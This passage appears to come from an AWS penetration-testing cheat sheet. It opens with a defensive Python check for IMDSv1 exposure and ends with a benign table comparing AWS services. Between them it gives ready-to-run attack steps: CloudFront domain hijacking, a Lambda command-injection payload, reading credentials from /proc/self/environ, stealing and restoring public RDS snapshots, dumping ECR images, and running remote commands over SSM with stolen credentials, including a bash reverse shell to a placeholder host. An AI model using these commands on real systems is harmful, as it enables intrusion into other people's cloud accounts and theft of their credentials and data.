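def imdsv1_exposed(described: dict) -> list:
    """One finding per instance whose metadata service still accepts IMDSv1.

    `described` is the parsed JSON of `aws ec2 describe-instances`. AWS's
    defaults (endpoint enabled, tokens optional, hop limit 1) are assumed
    for missing MetadataOptions fields.
    """
    findings = []
    for reservation in described.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            opts = inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint", "enabled") == "disabled":
                continue                          # no metadata service at all
            if opts.get("HttpTokens", "optional") == "required":
                continue                          # IMDSv2 enforced
            findings.append({
                "instance": inst["InstanceId"],
                "has_role": "IamInstanceProfile" in inst,
                "hop_limit": opts.get("HttpPutResponseHopLimit", 1),
            })
    # Instances with a role attached are the ones worth fixing first.
    findings.sort(key=lambda f: (not f["has_role"], f["instance"]))
    return findings


def audit_imds(describe_instances_json: str) -> list:
    return imdsv1_exposed(json.loads(describe_instances_json))


# Constructed sample: one hardened instance, one IMDSv1 instance with a role
# (hop limit 2, so containers on it can reach IMDS too), one IMDSv1 instance
# without a role, and one with the endpoint switched off entirely.
SAMPLE_DESCRIBE_INSTANCES = """{
  "Reservations": [
    {"Instances": [
      {"InstanceId": "i-11111111111111111",
       "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/web"},
       "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required", "HttpPutResponseHopLimit": 1}},
      {"InstanceId": "i-22222222222222222",
       "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/web"},
       "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 2}},
      {"InstanceId": "i-33333333333333333",
       "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1}},
      {"InstanceId": "i-44444444444444444",
       "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1}}
    ]}
  ]
}"""

if __name__ == "__main__":
    for f in audit_imds(SAMPLE_DESCRIBE_INSTANCES):
        print(f"{f['instance']}: IMDSv1 reachable, role attached={f['has_role']}, hop limit={f['hop_limit']}")
```

Flagged instances can be switched to IMDSv2-only with `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required`.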

Tools

```
# EC2 shadow copy attack
# https://github.com/Static-Flow/CloudCopy

# EC2 secrets recovery
# https://github.com/akhil-reni/ud-peep
```

Cloudfront

Info

```
CloudFront is a CDN and it routes requests by matching the Host header against each distribution's configured CNAMEs, so:
- The domain "test.disloops.com" is a CNAME record that points to "disloops.com".
- The "disloops.com" domain is set up to use a CloudFront distribution.
- Because "test.disloops.com" was not added to the "Alternate Domain Names (CNAMEs)" field for the distribution, requests to "test.disloops.com" will fail.
- Another user can create a CloudFront distribution and add "test.disloops.com" to its "Alternate Domain Names (CNAMEs)" field to hijack the domain.
```

Tools

```
# https://github.com/MindPointGroup/cloudfrunt
git clone --recursive https://github.com/MindPointGroup/cloudfrunt
pip install -r requirements.txt
python cloudfrunt.py -o cloudfrunt.com.s3-website-us-east-1.amazonaws.com -i S3-cloudfrunt -l list.txt
```

AWS Lambda

Info

```
# Welcome to serverless!!!!
# AWS Lambda functions are essentially short-lived servers that run your function and produce output that can then be used by other applications or consumed by other endpoints.

# OS command injection in Lambda
curl "https://API-endpoint/api/stringhere"

# For a md5 converter endpoint "https://API-endpoint/api/hello;id;w;cat%20%2fetc%2fpasswd"
aws lambda list-functions
aws lambda get-function --function-name <FUNCTION-NAME>
aws lambda get-policy --function-name <FUNCTION-NAME>
aws apigateway get-stages

# Download the function code
aws lambda list-functions
aws lambda get-function --function-name name_we_retrieved_from_above --query 'Code.Location'
wget -O myfunction.zip URL_from_above_step

# Steal creds via XXE or SSRF by reading:
/proc/self/environ
# If blocked, try to read the environment of other processes:
/proc/[1..20]/environ
```

Tools

```
# https://github.com/puresec/lambda-proxy
# SQLMap to Lambda!!!
python3 main.py
sqlmap -r request.txt

# https://github.com/twistlock/splash
# Pseudo Lambda shell
```

AWS Inspector

```
# Amazon Inspector is an automated security assessment service that helps improve the security and compliance of applications deployed on AWS.
```

AWS RDS

Basic

```
aws rds describe-db-instances
```

Attacks

```
# Just like MySQL, try for SQLi!
# Check whether 3306 is exposed
# sqlmap is your friend ;)

# Stealing RDS snapshots
- Search for public snapshots
aws rds describe-db-snapshots --include-public --snapshot-type public --db-snapshot-identifier arn:aws:rds:us-east-1:159236164734:snapshot:globalbutterdbbackup
- Restore it into an instance
aws rds restore-db-instance-from-db-snapshot --db-instance-identifier recoverdb --publicly-accessible --db-snapshot-identifier arn:aws:rds:us-east-1:159236164734:snapshot:globalbutterdbbackup --availability-zone us-east-1b
- Once restored, try to access it
aws rds describe-db-instances --db-instance-identifier recoverdb
- Reset the master credentials
aws rds modify-db-instance --db-instance-identifier recoverdb --master-user-password NewPassword1 --apply-immediately
- Takes some time; you can check the status:
aws rds describe-db-instances
- Try to reach it from the EC2 instance where it was restored
nc rds-endpoint 3306 -zvv
- If it is unreachable, you may need to open 3306:
  - In the RDS console, click on the recoverdb instance
  - Click on the Security Group
  - Add an inbound rule for port 3306 TCP for the Cloudhacker IP
- Then connect to it
mysql -u <username> -p -h <rds-instance-endpoint>
```

ECR

Info

```
Amazon Elastic Container Registry - Docker container registry
aws ecr get-login
aws ecr get-login-password | docker login --username AWS --password-stdin XXXXXXXXX.dkr.ecr.eu-west-1.amazonaws.com/some-registry && docker pull XXXXXXXX.dkr.ecr.eu-west-1.amazonaws.com/docker-test:latest && docker inspect docker-test
aws ecr list-images --repository-name REPO_NAME --registry-id ACCOUNT_ID
aws ecr batch-get-image --repository-name XXXX --registry-id XXXX --image-ids imageTag=latest
aws ecr get-download-url-for-layer --repository-name XXXX --registry-id XXXX --layer-digest "sha256:XXXXX"
```

Tools

```
# After AWS credentials are compromised

# https://github.com/RhinoSecurityLabs/ccat
docker run -it -v ~/.aws:/root/.aws/ -v /var/run/docker.sock:/var/run/docker.sock -v ${PWD}:/app/ rhinosecuritylabs/ccat:latest
```

ECS

Info

```
ECS - Elastic Container Service (a container orchestration service)
```

AWS Cognito API

Amazon Cognito is a user identity and data synchronization service. If the website uses other AWS services (like Amazon S3, Amazon DynamoDB, etc.), Amazon Cognito can issue temporary credentials with limited privileges that users then use to access those resources.

```
# Check for cognito-identity requests with GetCredentialsForIdentity
```

AWS Systems Manager

```
# AWS SSM
- The agent must be installed on the machines
- It's used to create roles and policies

# Executing commands
aws ssm describe-instance-information # Get instances
aws ssm describe-instance-information --output text --query "InstanceInformationList[*]"
- Send an "ifconfig" command and get its CommandId
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP config" --parameters commands=ifconfig --output text --query "Command.CommandId"
- Read the output of the ifconfig command by its CommandId
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}"

# RCE
aws ssm send-command --document-name "AWS-RunShellScript" --comment "RCE test: whoami" --targets "Key=instanceids,Values=[instanceid]" --parameters 'commands=whoami'
aws ssm list-command-invocations --command-id "[CommandId]" --details

# Getting a shell
- You need to have reverse.sh uploaded to S3 already
#!/bin/bash
bash -i >& /dev/tcp/REVERSE-SHELL-CATCHER/9999 0>&1
- Start your listener
aws ssm send-command --document-name "AWS-RunRemoteScript" --instance-ids "INSTANCE-ID-HERE" --parameters '{"sourceType":["S3"],"sourceInfo":["{\"path\":\"PATH-TO-S3-SHELL-SCRIPT\"}"],"commandLine":["/bin/bash NAME-OF-SHELL-SCRIPT"]}' --query "Command.CommandId"

# Read info from SSM
aws ssm describe-parameters
aws ssm get-parameters --name <NameYouFindAbove>

# EC2 with SSM enabled leads to RCE
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
```

Aws Services Summary

AWS Service
Should have been called
Use this to
It's like
EC2
Amazon Virtual Servers
Host the bits of things you think of as a computer.
It's handwavy, but EC2 instances are similar to the virtual private servers you'd get at Linode, DigitalOcean or Rackspace.
IAM
Users, Keys and Certs
Set up additional users, set up new AWS Keys and policies.
S3
Amazon Unlimited FTP Server
Store images and other assets for websites. Keep backups and share files between services. Host static websites. Also, many of the other AWS services write and read from S3.
| Service | Should have been called | Use it to | It's like |
| --- | --- | --- | --- |
| VPC | Amazon Virtual Colocated Rack | Overcome objections that "all our stuff is on the internet!" by adding an additional layer of security. Makes it appear as if all of your AWS services are on the same little network instead of being small pieces in a much bigger network. | If you're familiar with networking: VLANs |
| Lambda | AWS App Scripts | Run little self-contained snippets of JS, Java or Python to do discrete tasks. Sort of a combination of a queue and execution in one. Used for storing and then executing changes to your AWS setup or responding to events in S3 or DynamoDB. | |
| API Gateway | API Proxy | Proxy your app's API through this so you can throttle bad client traffic, test new versions, and present methods more cleanly. | 3Scale |
| RDS | Amazon SQL | Be your app's MySQL, Postgres, and Oracle database. | Heroku Postgres |
| Route53 | Amazon DNS + Domains | Buy a new domain and set up the DNS records for that domain. | DNSimple, GoDaddy, Gandi |
| SES | Amazon Transactional Email | Send one-off emails like password resets, notifications, etc. You could use it to send a newsletter if you wrote all the code, but that's not a great idea. | SendGrid, Mandrill, Postmark |
| CloudFront | Amazon CDN | Make your websites load faster by spreading out static file delivery to be closer to where your users are. | MaxCDN, Akamai |
| CloudSearch | Amazon Fulltext Search | Pull in data on S3 or in RDS and then search it for every instance of 'Jimmy'. | Sphinx, Solr, ElasticSearch |
| DynamoDB | Amazon NoSQL | Be your app's massively scalable key-value-ish store. | MongoLab |
| Elasticache | Amazon Memcached | Be your app's Memcached or Redis. | Redis to Go, Memcachier |
| Elastic Transcoder | Amazon Beginning Cut Pro | Deal with video weirdness (change formats, compress, etc.). | |
| SQS | Amazon Queue | Store data for future processing in a queue. The lingo for this is storing "messages", but it doesn't have anything to do with email or SMS. SQS doesn't have any logic; it's just a place to put things and take things out. | RabbitMQ, Sidekiq |
| WAF | AWS Firewall | Block bad requests to CloudFront-protected sites (aka stop people trying 10,000 passwords against /wp-admin). | Sophos, Kaspersky |
| Cognito | Amazon OAuth as a Service | Give end users (non-AWS users) the ability to log in with Google, Facebook, etc. | OAuth.io |
| Device Farm | Amazon Drawer of Old Android Devices | Test your app on a bunch of different iOS and Android devices simultaneously. | MobileTest, iOS emulator |
| Mobile Analytics | Spot-on name; Amazon product managers take note | Track what people are doing inside of your app. | Flurry |
| SNS | Amazon Messenger | Send mobile notifications, emails and/or SMS messages. | UrbanAirship, Twilio |
| CodeCommit | Amazon GitHub | Version control your code: hosted Git. | GitHub, BitBucket |
| Code Deploy | Not bad | Get your code from your CodeCommit repo (or GitHub) onto a bunch of EC2 instances in a sane way. | Heroku, Capistrano |
| CodePipeline | Amazon Continuous Integration | Run automated tests on your code and then do stuff with it depending on whether it passes those tests. | CircleCI, Travis |
| EC2 Container Service | Amazon Docker as a Service | Put a Dockerfile into an EC2 instance so you can run a website. | |
| Elastic Beanstalk | Amazon Platform as a Service | Move your app hosted on Heroku to AWS when it gets too expensive. | Heroku, BlueMix, Modulus |
| AppStream | Amazon Citrix | Put a copy of a Windows application on a Windows machine that people get remote access to. | Citrix, RDP |
| Direct Connect | Pretty spot on actually | Pay your telco + AWS to get a dedicated leased line from your data center or network to AWS. Cheaper than Internet egress for data. | A toll road turnpike bypassing the crowded side streets. |
| Directory Service | Pretty spot on actually | Tie together other apps that need a Microsoft Active Directory to control them. | |
| WorkDocs | Amazon Unstructured Files | Share Word docs with your colleagues. | Dropbox, DataAnywhere |
| WorkMail | Amazon Company Email | Give everyone in your company the same email system and calendar. | Google Apps for Domains |
| Workspaces | Amazon Remote Computer | Gives you a standard Windows desktop that you're remotely controlling. | |
| Service Catalog | Amazon Setup Already | Give other AWS users in your group access to preset apps you've built so they don't have to read guides like this. | |
| Storage Gateway | S3 pretending it's part of your corporate network | Stop buying more storage to keep Word docs on. Make it easier to automate getting files into S3 from your corporate network. | |
| Data Pipeline | Amazon ETL | Extract, transform and load data from elsewhere in AWS. Schedule when it happens and get alerts when jobs fail. | |
| Elastic Map Reduce | Amazon Hadooper | Iterate over massive text files of raw data that you're keeping in S3. | Treasure Data |
| Glacier | Really slow Amazon S3 | Make backups of the backups that you keep on S3; intended for long-term archiving. Beware the cost of getting data back out in a hurry. | |
| Kinesis | Amazon High Throughput | Ingest lots of data very quickly (for things like analytics or people retweeting Kanye) that you then later use other AWS services to analyze. | Kafka |
| RedShift | Amazon Data Warehouse | Store a whole bunch of analytics data, do some processing, and dump it out. | |
| Machine Learning | Skynet | Predict future behavior from existing data for problems like fraud detection or "people that bought x also bought y." | |
| SWF | Amazon EC2 Queue | Build a service of "deciders" and "workers" on top of EC2 to accomplish a set task. Unlike SQS, logic is set up inside the service to determine how and what should happen. | IronWorker |
| Snowball | AWS Big Old Portable Storage | Get a bunch of hard drives you can attach to your network to make getting large amounts of data (terabytes) into and out of AWS easier. | Shipping a Network Attached Storage device to AWS |
| CloudFormation | Amazon Services Setup | Set up a bunch of connected AWS services in one go. | |
| CloudTrail | Amazon Logging | Log who is doing what in your AWS stack (API calls). | |
| CloudWatch | Amazon Status Pager | Get alerts about AWS services messing up or disconnecting. | PagerDuty, Statuspage |
| Config | Amazon Configuration Management | Keep from going insane if you have a large AWS setup and changes are happening that you want to track. | |
| OpsWorks | Amazon Chef | Handle running your application with things like auto-scaling. | |
| Trusted Advisor | Amazon Pennypincher | Find out where you're paying too much in your AWS setup (unused EC2 instances, etc.). | |
| Inspector | Amazon Auditor | Scan your AWS setup to determine whether you've set it up in an insecure way. | Alert Logic |

AWS vs AD
